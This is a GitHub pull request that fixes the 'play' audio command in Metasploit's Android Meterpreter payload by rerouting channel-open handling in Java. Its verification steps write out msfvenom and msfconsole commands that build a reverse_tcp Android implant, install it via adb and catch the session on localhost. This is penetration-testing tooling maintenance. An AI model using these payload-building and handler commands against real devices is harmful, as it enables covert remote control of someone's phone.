### PR TITLE
fix android meterpreter > play audio command

### DIFF
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -109,7 +109,7 @@ public class AndroidMeterpreter extends Meterpreter {
         getCommandManager().resetNewCommands();
         CommandManager mgr = getCommandManager();
         Loader.setCWD(new File(writeableDir));
-        mgr.registerCommand(CommandId.CORE_CHANNEL_OPEN, stdapi_channel_open.class);
+        mgr.registerCommand(CommandId.CORE_CHANNEL_OPEN, android_channel_open.class);
         mgr.registerCommand(CommandId.STDAPI_FS_CHDIR, stdapi_fs_chdir.class);
         mgr.registerCommand(CommandId.STDAPI_FS_DELETE_DIR, stdapi_fs_delete_dir.class);
         mgr.registerCommand(CommandId.STDAPI_FS_DELETE_FILE, stdapi_fs_delete_file.class);

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/android_channel_open.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/android_channel_open.java
@@ -1,22 +1,34 @@
 package com.metasploit.meterpreter.android;
 
 import android.media.MediaPlayer;
-import com.metasploit.meterpreter.*;
-import com.metasploit.meterpreter.command.Command;
+
+import com.metasploit.meterpreter.Channel;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
 import com.metasploit.meterpreter.command.NotYetImplementedCommand;
 import com.metasploit.meterpreter.stdapi.Loader;
+import com.metasploit.meterpreter.stdapi.stdapi_channel_open;
 
-import java.io.*;
+import java.io.ByteArrayInputStream;
+import java.io.FileInputStream;
+import java.io.FileNotFoundException;
+import java.io.FileOutputStream;
+import java.io.IOException;
 
-public class channel_create_audio_output implements Command {
-
-    static String fpath = Loader.expand("wav").getPath();
+public class android_channel_open extends stdapi_channel_open {
 
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        Channel channel = new AudioChannel(meterpreter);
-        response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
-        return ERROR_SUCCESS;
+        String channelType = request.getStringValue(TLVType.TLV_TYPE_CHANNEL_TYPE);
+        if (channelType.equals("audio_output")) {
+            Channel channel = new AudioChannel(meterpreter);
+            response.add(TLVType.TLV_TYPE_CHANNEL_ID, channel.getID());
+            return ERROR_SUCCESS;
+        }
+        return super.execute(meterpreter, request, response);
     }
+
+    static String fpath = Loader.expand("wav").getPath();
 
     static class AudioChannel extends Channel {
         public AudioChannel(Meterpreter meterpreter) throws FileNotFoundException {
@@ -39,4 +51,5 @@ public class channel_create_audio_output implements Command {
             mediaPlayer.start();
         }
     }
+
 }

--- a/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_channel_open.java
+++ b/java/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_channel_open.java
@@ -33,6 +33,9 @@ public class stdapi_channel_open implements Command {
         if (channelType.equals("stdapi_net_tcp_server")) {
             return executeTcpServer(meterpreter, request, response);
         }
+        if (channelType.equals("stdapi_net_udp_client")) {
+            return executeUdpClient(meterpreter, request, response);
+        }
         return ERROR_FAILURE;
     }
 
@@ -51,7 +54,7 @@ public class stdapi_channel_open implements Command {
             if (channel == null) {
                 channel = new Channel(meterpreter, new FileInputStream(Loader.expand(fpath)), null);
             }
-        } else if (mode.equals("r") || mode.equals("wb") || mode.equals("wbb")) {
+        } else if (mode.equals("w") || mode.equals("wb") || mode.equals("wbb")) {
             channel = new Channel(meterpreter, new ByteArrayInputStream(new byte[0]), new FileOutputStream(Loader.expand(fpath).getPath(), false));
         } else if (mode.equals("a") || mode.equals("ab") || mode.equals("abb")) {
             channel = new Channel(meterpreter, new ByteArrayInputStream(new byte[0]), new FileOutputStream(Loader.expand(fpath).getPath(), true));
@@ -64,7 +67,6 @@ public class stdapi_channel_open implements Command {
     }
 
     private int executeUdpClient(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-
         String localHost = request.getStringValue(TLVType.TLV_TYPE_LOCAL_HOST);
         int localPort = request.getIntValue(TLVType.TLV_TYPE_LOCAL_PORT);
         String peerHost = request.getStringValue(TLVType.TLV_TYPE_PEER_HOST);


### PR DESCRIPTION
This change fixes the `meterpreter > play` command on Android

## Verification

- [ ] Build these changes
- [ ] Get an Android meterpreter session (via adb):
```
msfvenom -p android/meterpreter/reverse_tcp SessionRetryWait=2 LHOST=127.0.0.1 LPORT=4444 -o met.apk
adb install met.apk
adb reverse tcp:4444 tcp:4444
adb shell am startservice com.metasploit.stage/.MainService
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost 127.0.0.1; set lport 4444; set ExitOnSession false; run -j"
```
- [ ] Run `meterpreter > play data/sounds/default/excellent.wav`

## Before
```
meterpreter > play data/sounds/default/excellent.wav
[*] Playing data/sounds/default/excellent.wav...
[-] core_channel_open: Operation failed: 1
```

## After
```
meterpreter > play data/sounds/default/excellent.wav
[*] Playing data/sounds/default/excellent.wav...
[*] Done
```